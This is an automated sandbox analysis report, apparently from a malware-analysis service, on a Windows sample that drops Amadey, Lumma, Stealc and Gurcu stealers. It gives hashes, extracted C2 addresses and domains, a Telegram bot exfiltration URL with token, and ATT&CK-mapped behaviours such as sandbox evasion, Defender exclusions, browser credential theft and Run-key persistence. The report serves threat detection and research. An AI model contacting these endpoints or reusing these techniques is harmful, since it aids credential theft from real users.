amadey | 262db07d64f703a8c4ae4bd32e34a11bce0421e9ff715588b0ac67d8b7faeb2a

Analysis

max time kernel
118s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03/12/2024, 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Size

1.8MB
MD5

08d46090c22ff00bd53e843027e0dc26
SHA1

ec4d86baa8a294a18daf44fcb61eca03c3116c23
SHA256

1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215
SHA512

c9d9214076bd90886b52713287c771264f2a46a76d93b42c6a208bc95e0f5d58a4d41dafe7feadf114f27c1cd430fd90c571e5a30f078c1b9459a8212224b0ed
SSDEEP

24576:z2BoyWmAgwI0L6ul/urTQzxYtarKUKkpOb0A93R8S9D5pbgFqAKzeleH4W+:z2OFe0L6ugiKhxs6pqqAKzCeH

Score

10^/10

amadey gurcu lumma stealc 9c9aa5 default_valenciga drum fed3aa credential_access discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

lumma

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

gurcu

https://api.telegram.org/bot8009002136:AAHPJrz2-Pn7ZXvJ8icMhaRHpwMHWNcOutY/sendDocumen

Extracted

Family

lumma

https://drive-connect.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2628 created 3536	2628	NK4PJqi.exe	56
PID 3236 created 2652	3236	rhnew.exe	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rhnew.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	98b117a7c2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e4bf8a11f7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f3dd0e015.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f3dd0e015.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	60fb84b2fe.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cf2d2ab250.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5100	powershell.exe
4664	powershell.exe
2548	powershell.exe
2424	powershell.exe
6140	powershell.exe
4072	powershell.exe
5372	powershell.exe
5416	powershell.exe
5924	powershell.exe
5848	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2484	chrome.exe
6516	msedge.exe
6164	msedge.exe
5692	msedge.exe
5900	chrome.exe
6124	chrome.exe
1008	chrome.exe
5128	msedge.exe
5672	msedge.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e4bf8a11f7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f3dd0e015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cf2d2ab250.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f3dd0e015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f3dd0e015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	60fb84b2fe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rhnew.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	98b117a7c2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	98b117a7c2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e4bf8a11f7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f3dd0e015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cf2d2ab250.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	60fb84b2fe.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	vvcWObH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	98b117a7c2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	AllNew.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 25 IoCs

pid	Process
3568	skotes.exe
2628	NK4PJqi.exe
5028	DU1zDwm.exe
4404	vvcWObH.exe
4420	skotes.exe
1780	MicrosoftEdgeUpdateTaskMachineCoreSC.exe
3236	rhnew.exe
5004	98b117a7c2.exe
5532	axplong.exe
6884	stealc_default2.exe
7048	e4bf8a11f7.exe
5792	alex2022.exe
5072	alex2022.exe
3284	axplong.exe
5316	skotes.exe
1828	MicrosoftEdgeUpdateTaskMachineCoreSC.exe
6376	8f3dd0e015.exe
5804	8f3dd0e015.exe
5124	AllNew.exe
6920	Gxtuum.exe
5740	f680663ba9.exe
5044	trru7rd2.exe
4980	60fb84b2fe.exe
3560	cf2d2ab250.exe
4620	ATLEQQXO.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	cf2d2ab250.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	98b117a7c2.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	e4bf8a11f7.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	8f3dd0e015.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	60fb84b2fe.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	rhnew.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	8f3dd0e015.exe

Loads dropped DLL 2 IoCs

pid	Process
6884	stealc_default2.exe
6884	stealc_default2.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8f3dd0e015.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011466001\\8f3dd0e015.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f680663ba9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011467001\\f680663ba9.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60fb84b2fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011468001\\60fb84b2fe.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e4bf8a11f7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011465001\\e4bf8a11f7.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	api.myip.com
20	api.myip.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
6956	cmd.exe
2420	cmd.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0009000000023ca3-3905.dat	autoit_exe

Drops file in System32 directory 16 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
1168	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
3568	skotes.exe
4420	skotes.exe
3236	rhnew.exe
5004	98b117a7c2.exe
5532	axplong.exe
7048	e4bf8a11f7.exe
3284	axplong.exe
5316	skotes.exe
6376	8f3dd0e015.exe
5804	8f3dd0e015.exe
4980	60fb84b2fe.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2628 set thread context of 2372	2628	NK4PJqi.exe	93
PID 1780 set thread context of 100	1780	MicrosoftEdgeUpdateTaskMachineCoreSC.exe	165
PID 5792 set thread context of 5072	5792	alex2022.exe	195
PID 1828 set thread context of 424	1828	MicrosoftEdgeUpdateTaskMachineCoreSC.exe	200

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplong.job	98b117a7c2.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe
File created	C:\Windows\Tasks\skotes.job	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x0009000000023cb2-3962.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
4180	3236	WerFault.exe	180
6540	5848	WerFault.exe	203
6816	7048	WerFault.exe	190
316	6376	WerFault.exe	201
840	5072	WerFault.exe	195
2308	5072	WerFault.exe	195
772	6856	WerFault.exe	256

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e4bf8a11f7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ATLEQQXO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f3dd0e015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trru7rd2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rhnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f3dd0e015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NK4PJqi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	98b117a7c2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	60fb84b2fe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cf2d2ab250.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1ceab2ffb1eeba5856886c108f56de4f25bb0e15b7ff84d75cae17197f3f2215.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6620	PING.EXE
4008	powershell.exe
264	powershell.exe
4436	PING.EXE
3048	powershell.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dxdiag.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
7008	taskkill.exe
1880	taskkill.exe
2424	taskkill.exe
1644	taskkill.exe
1412	taskkill.exe
5756	taskkill.exe
6168	taskkill.exe
6928	taskkill.exe

Modifies registry class 36 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-493223053-2004649691-1575712786-1000\{B4B8EAA4-C27A-44D5-95AB-83E76BB2C684}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
